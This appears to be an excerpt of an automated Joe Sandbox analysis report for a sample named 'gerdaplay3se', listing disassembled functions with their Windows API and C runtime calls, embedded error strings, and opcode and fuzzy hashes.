                                                                                  • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                  • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                                                  • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                                                  • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                                                  APIs
                                                                                  • std::exception::exception.LIBCMT ref: 02D718BF
                                                                                    • Part of subcall function 02D72413: std::exception::_Copy_str.LIBCMT ref: 02D7242C
                                                                                    • Part of subcall function 02D70C90: __CxxThrowException@8.LIBCMT ref: 02D70CEE
                                                                                  • std::exception::exception.LIBCMT ref: 02D7191E
                                                                                  Strings
                                                                                  • boost unique_lock has no mutex, xrefs: 02D718AE
                                                                                  • $, xrefs: 02D71923
                                                                                  • boost unique_lock owns already the mutex, xrefs: 02D7190D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                  • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                  • API String ID: 2140441600-46888669
                                                                                  • Opcode ID: be97966c300bf5ced94c44939d6e85aa333227344877769a4465cae1fd2fab27
                                                                                  • Instruction ID: d183bd4b047ad82c1a726811bf381bf05aa30fd23e33ab51d7a6c8ceed636dd3
                                                                                  • Opcode Fuzzy Hash: be97966c300bf5ced94c44939d6e85aa333227344877769a4465cae1fd2fab27
                                                                                  • Instruction Fuzzy Hash: 6C21D5B15183809FD760EF24C54575BBBE9BB88708F504A6DF4A587380E7B9D808CF92
                                                                                  APIs
                                                                                  • __getptd_noexit.LIBCMT ref: 02D749C0
                                                                                    • Part of subcall function 02D75BB2: GetLastError.KERNEL32(76230A60,7622F550,02D75DA0,02D72F73,7622F550,?,02D6606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D66508), ref: 02D75BB4
                                                                                    • Part of subcall function 02D75BB2: __calloc_crt.LIBCMT ref: 02D75BD5
                                                                                    • Part of subcall function 02D75BB2: __initptd.LIBCMT ref: 02D75BF7
                                                                                    • Part of subcall function 02D75BB2: GetCurrentThreadId.KERNEL32 ref: 02D75BFE
                                                                                    • Part of subcall function 02D75BB2: SetLastError.KERNEL32(00000000,02D6606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D66508), ref: 02D75C16
                                                                                  • __calloc_crt.LIBCMT ref: 02D749E3
                                                                                  • __get_sys_err_msg.LIBCMT ref: 02D74A01
                                                                                  • __invoke_watson.LIBCMT ref: 02D74A1E
                                                                                  Strings
                                                                                  • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D749CB, 02D749F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                  • API String ID: 109275364-798102604
                                                                                  • Opcode ID: f23cbed0c36f21a75055a05f346e1901980c53201e294782fd473e9f3725d567
                                                                                  • Instruction ID: 9f2560c852d682cca3e8f3cff2d18750261f4b2aafa204a04f892d3c1684900e
                                                                                  • Opcode Fuzzy Hash: f23cbed0c36f21a75055a05f346e1901980c53201e294782fd473e9f3725d567
                                                                                  • Instruction Fuzzy Hash: 9DF0B4325447156AAB23A92A5C40A7B72BEEF416A4F01052AF9C5D6300FB29DC4096A5
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
                                                                                  • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
                                                                                  • GetLastError.KERNEL32 ref: 02D6237A
                                                                                    • Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID: pqcs
                                                                                  • API String ID: 1619523792-2559862021
                                                                                  • Opcode ID: e4a4255b049fb8bf9b5d05a2cec7bbbc93240f46d00bc1cd263877e9bacd0d3b
                                                                                  • Instruction ID: f555309ace93d900484f1d32f78b0dadba6e0117cc9cb12248801a18b013e93c
                                                                                  • Opcode Fuzzy Hash: e4a4255b049fb8bf9b5d05a2cec7bbbc93240f46d00bc1cd263877e9bacd0d3b
                                                                                  • Instruction Fuzzy Hash: EFF01D74950304ABE710AA74DC0DBBBB7BCEB01701F204569E845D6340F7709D148BA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D64035
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02D64042
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02D64049
                                                                                  • std::exception::exception.LIBCMT ref: 02D64063
                                                                                    • Part of subcall function 02D6A601: __EH_prolog.LIBCMT ref: 02D6A606
                                                                                    • Part of subcall function 02D6A601: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A615
                                                                                    • Part of subcall function 02D6A601: __CxxThrowException@8.LIBCMT ref: 02D6A634
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 3112922283-2104205924
                                                                                  • Opcode ID: 7e5ef05ac52e6f04f90c7e2c83375f4b6a6d98143dfbaff9ce1fcc23552b1f00
                                                                                  • Instruction ID: 0db92e9eca2ac393666af4059dd02359f773e769a90ba0d9590796327c2e5e4b
                                                                                  • Opcode Fuzzy Hash: 7e5ef05ac52e6f04f90c7e2c83375f4b6a6d98143dfbaff9ce1fcc23552b1f00
                                                                                  • Instruction Fuzzy Hash: 84F058B1E44209EBDB00EFE0E908BAFB778FB04304FA04559E914A2340DB355A148B61
                                                                                  APIs
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                                                  • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                                                  • GetFileType.KERNEL32(00000000), ref: 00403836
                                                                                  • SetHandleCount.KERNEL32 ref: 0040386D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                  • String ID:
                                                                                  • API String ID: 1710529072-0
                                                                                  • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                  • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                                                  • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                                                  • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                                                  APIs
                                                                                    • Part of subcall function 02D71990: CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D719E1
                                                                                    • Part of subcall function 02D71990: WaitForSingleObject.KERNEL32(?,000000FF,84A2267A,?,?,?,?,84A2267A,02D71963,84A2267A), ref: 02D719F8
                                                                                  • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D71C5E
                                                                                  • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D71C7E
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D71CB7
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D71D0B
                                                                                  • SetEvent.KERNEL32(?), ref: 02D71D12
                                                                                    • Part of subcall function 02D6418C: CloseHandle.KERNEL32(00000000,?,02D71C45), ref: 02D641B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 4166353394-0
                                                                                  • Opcode ID: 496e22b7d154a5b96e2177bea16a85b3232d7ac20427f752ba5597c48d762c7e
                                                                                  • Instruction ID: 27fc61b34343a997ef07b044be739084ddcaec0eca7864b99312c1d97b3d5bb4
                                                                                  • Opcode Fuzzy Hash: 496e22b7d154a5b96e2177bea16a85b3232d7ac20427f752ba5597c48d762c7e
                                                                                  • Instruction Fuzzy Hash: 9D41BD71A003118BEB259F28CC80B26B7A4EF45724F2507A8EC19DB395E739DC11DFA6
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6E034
                                                                                    • Part of subcall function 02D61A01: TlsGetValue.KERNEL32 ref: 02D61A0A
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6E0B3
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D6E0CF
                                                                                  • InterlockedIncrement.KERNEL32(02D95180), ref: 02D6E0F4
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D6E109
                                                                                    • Part of subcall function 02D627F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D6284E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1578506061-0
                                                                                  • Opcode ID: b3b9272dc6a883d73f0a7153d9e3e59c2d312fb242a74baa71a73953eef84c8e
                                                                                  • Instruction ID: ba749c47ecd264b713bd11ad34f49ade562ee4d5ef5e435b5d4e9b487a210718
                                                                                  • Opcode Fuzzy Hash: b3b9272dc6a883d73f0a7153d9e3e59c2d312fb242a74baa71a73953eef84c8e
                                                                                  • Instruction Fuzzy Hash: 7E3148B59016059FDB10DFA8D548AAEBBF8FF18310F20455ED849D7741E735AA04CFA0
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02D802F0
                                                                                    • Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
                                                                                    • Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
                                                                                    • Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F
                                                                                  • _free.LIBCMT ref: 02D80303
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1020059152-0
                                                                                  • Opcode ID: a83e4e44521e0ffda0455919de1892dcc38d83955a5e5f8acfe987d5610db684
                                                                                  • Instruction ID: d0c4ca69d361337077024196f23fa044dbb313f2dff0fa2a9313b399d1a10635
                                                                                  • Opcode Fuzzy Hash: a83e4e44521e0ffda0455919de1892dcc38d83955a5e5f8acfe987d5610db684
                                                                                  • Instruction Fuzzy Hash: F111C632908615ABEB203F70BC48B6A3799DF05362F104925FD899A350EB39CC54CBA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D621DA
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D621ED
                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D62224
                                                                                  • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D62237
                                                                                  • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D62261
                                                                                    • Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
                                                                                    • Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
                                                                                    • Part of subcall function 02D62341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
                                                                                    • Part of subcall function 02D62341: GetLastError.KERNEL32 ref: 02D6237A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1856819132-0
                                                                                  • Opcode ID: d44b5903b1247e325cc1e3e55e2e049a5daa46f36c040662b177b9690396d70c
                                                                                  • Instruction ID: 5fbd7f746930159acc50e75637895118762998facfa241b7c073b02c248941e6
                                                                                  • Opcode Fuzzy Hash: d44b5903b1247e325cc1e3e55e2e049a5daa46f36c040662b177b9690396d70c
                                                                                  • Instruction Fuzzy Hash: 10117F71D14115DBDB01AFA4D84C6FEFBBAFB48310F20851AE855A2360D7714E61DB90
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6229D
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D622B0
                                                                                  • TlsGetValue.KERNEL32 ref: 02D622E7
                                                                                  • TlsSetValue.KERNEL32(?), ref: 02D62300
                                                                                  • TlsSetValue.KERNEL32(?,?,?), ref: 02D6231C
                                                                                    • Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
                                                                                    • Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
                                                                                    • Part of subcall function 02D62341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
                                                                                    • Part of subcall function 02D62341: GetLastError.KERNEL32 ref: 02D6237A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1856819132-0
                                                                                  • Opcode ID: ab2d38cef88904b0e9d26e21c5627830dd297a511342ee5d38cc9f60a7524c49
                                                                                  • Instruction ID: 2fbfd23c4a02d778e2c5638415c1b987504c73adce936e81deb6f2fd046d8f28
                                                                                  • Opcode Fuzzy Hash: ab2d38cef88904b0e9d26e21c5627830dd297a511342ee5d38cc9f60a7524c49
                                                                                  • Instruction Fuzzy Hash: 04114CB1D141189BDB01AFA4D8489EEFBBAEF48310F14452AE805A3350D7714D61DB90
                                                                                  APIs
                                                                                    • Part of subcall function 02D6B09C: __EH_prolog.LIBCMT ref: 02D6B0A1
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D6BC66
                                                                                    • Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D91D94,?,00000001), ref: 02D6BC7C
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D6BC8F
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D91D94,?,00000001), ref: 02D6BC9F
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6BCAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 2725315915-0
                                                                                  • Opcode ID: 18c865e30f6464ca15cbbdf069934b926ae30d3c276b2d74c65e7c2c892332f6
                                                                                  • Instruction ID: 4ac2cb1cd9f9b5838ca456c2c9fc254bfc225978dabcbec980efe10e4626f7cf
                                                                                  • Opcode Fuzzy Hash: 18c865e30f6464ca15cbbdf069934b926ae30d3c276b2d74c65e7c2c892332f6
                                                                                  • Instruction Fuzzy Hash: 9B0186B6A50305AFEB10AEB4DC8DF96B7BDEB04359F204515F625E6390DB60ED058B20
                                                                                  APIs
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D62432
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D62445
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D62454
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D62469
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D62470
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 747265849-0
                                                                                  • Opcode ID: 270bbfc0e22d5b554b729d022282a062657176c673c7a9ca5e264252031e8c9a
                                                                                  • Instruction ID: f2c3fae66db4bb309506f39221400f6939b12542ea406c6cacb93c53d9d473fd
                                                                                  • Opcode Fuzzy Hash: 270bbfc0e22d5b554b729d022282a062657176c673c7a9ca5e264252031e8c9a
                                                                                  • Instruction Fuzzy Hash: C8F01D76650204BBE6009AA1ED4DFE6B72CFB44711FA04811F601DA680D761BD20CBA1
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D61ED2
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D61EEA
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D61EF9
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D61F0E
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D61F15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID:
                                                                                  • API String ID: 830998967-0
                                                                                  • Opcode ID: e566d8f32e5881cd0606811420ea754770077331516f5e3e9a67dcdaf2e6e2f8
                                                                                  • Instruction ID: f9d6e87723dc8313c781f579ac212201bc59905bbd00b286960b7192472de91e
                                                                                  • Opcode Fuzzy Hash: e566d8f32e5881cd0606811420ea754770077331516f5e3e9a67dcdaf2e6e2f8
                                                                                  • Instruction Fuzzy Hash: BBF01776651605BBE700AFA1ED88FE6BB3CFF54745F200426F60196680D771A925CBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: invalid string position$string too long
                                                                                  • API String ID: 4104443479-4289949731
                                                                                  • Opcode ID: 97519eff1f12a5f6464ff1f2359483f84939bac21fcf33f29cd7f0e21cee2d4c
                                                                                  • Instruction ID: 28cc11895d7e46997aed28d052f6f77357772a1665f0e58ac4001feb0f3f55a5
                                                                                  • Opcode Fuzzy Hash: 97519eff1f12a5f6464ff1f2359483f84939bac21fcf33f29cd7f0e21cee2d4c
                                                                                  • Instruction Fuzzy Hash: 6B4192713003449FDB34DE69D888A76BBEAEB41764B10092DE956CB781C770ED0CDBA1
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D630C3
                                                                                  • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D63102
                                                                                  • _memcmp.LIBCMT ref: 02D63141
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastString_memcmp
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 1618111833-2422070025
                                                                                  • Opcode ID: 6fcea62c50f5055bb200d932038738817ee01b06de3f799ee10c9ac54c814b99
                                                                                  • Instruction ID: e1a0e7cbf3435a6c73c0a50aee7efa01f610077028e8c2bc3620c8667a34c217
                                                                                  • Opcode Fuzzy Hash: 6fcea62c50f5055bb200d932038738817ee01b06de3f799ee10c9ac54c814b99
                                                                                  • Instruction Fuzzy Hash: FA31C171900304DFDB209F64C888B7EB7A6FF45725F1085A9E86997380EB799D45CB90
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D69673
                                                                                    • Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56
                                                                                  • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D696EE
                                                                                  • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6970C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                  • String ID: Pz
                                                                                  • API String ID: 1633115879-1603573826
                                                                                  • Opcode ID: f0a7e277d98d2691b6d42e295b45359a73eec1ecb3a4e0b10412a64a835cba69
                                                                                  • Instruction ID: 1d9f69a29033454b0cffbccfad12d09406641e27c9fad738837a535e7e818bfa
                                                                                  • Opcode Fuzzy Hash: f0a7e277d98d2691b6d42e295b45359a73eec1ecb3a4e0b10412a64a835cba69
                                                                                  • Instruction Fuzzy Hash: 37216AB5910B019FD320DF6AD584BA6FBF4FF08710F50892EE54A87B40D330A914CBA0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D61F5B
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D61FC5
                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 02D61FD2
                                                                                    • Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                  • String ID: iocp
                                                                                  • API String ID: 998023749-976528080
                                                                                  • Opcode ID: 408261d7606b27f5d759da59814505ab7d8160e33d8c6c1ee41d9d7bc1e09dc4
                                                                                  • Instruction ID: b52f2584991697aa3d2a347a23196e1b95669f1dccee5330bbe78fd2ee7fe97f
                                                                                  • Opcode Fuzzy Hash: 408261d7606b27f5d759da59814505ab7d8160e33d8c6c1ee41d9d7bc1e09dc4
                                                                                  • Instruction Fuzzy Hash: ED21A4B1901B449FC7209F6AD50455BFBF9FF94720B108A1FD4A687B90D7B0AA04CFA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D637B6
                                                                                  • __localtime64.LIBCMT ref: 02D637C1
                                                                                    • Part of subcall function 02D72540: __gmtime64_s.LIBCMT ref: 02D72553
                                                                                  • std::exception::exception.LIBCMT ref: 02D637D9
                                                                                    • Part of subcall function 02D72413: std::exception::_Copy_str.LIBCMT ref: 02D7242C
                                                                                    • Part of subcall function 02D6A45F: __EH_prolog.LIBCMT ref: 02D6A464
                                                                                    • Part of subcall function 02D6A45F: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A473
                                                                                    • Part of subcall function 02D6A45F: __CxxThrowException@8.LIBCMT ref: 02D6A492
                                                                                  Strings
                                                                                  • could not convert calendar time to UTC time, xrefs: 02D637CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                  • String ID: could not convert calendar time to UTC time
                                                                                  • API String ID: 1963798777-2088861013
                                                                                  • Opcode ID: 1210934f02b16d77c843b45b804b0347296fb5b2264f9cb0a44aee1bb25ea497
                                                                                  • Instruction ID: d1e2610ddecbb96661676ebe5ac5ba6976458e5b79b4fb77d0c59bd3622efff2
                                                                                  • Opcode Fuzzy Hash: 1210934f02b16d77c843b45b804b0347296fb5b2264f9cb0a44aee1bb25ea497
                                                                                  • Instruction Fuzzy Hash: 7DE06DB1D0024A9BCB00FFA0E8087FEB77AEF04304F5045A9D824A2750EB385E098FA5
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,00008000,00004000,7622DFF0,?,00000000), ref: 00404092
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
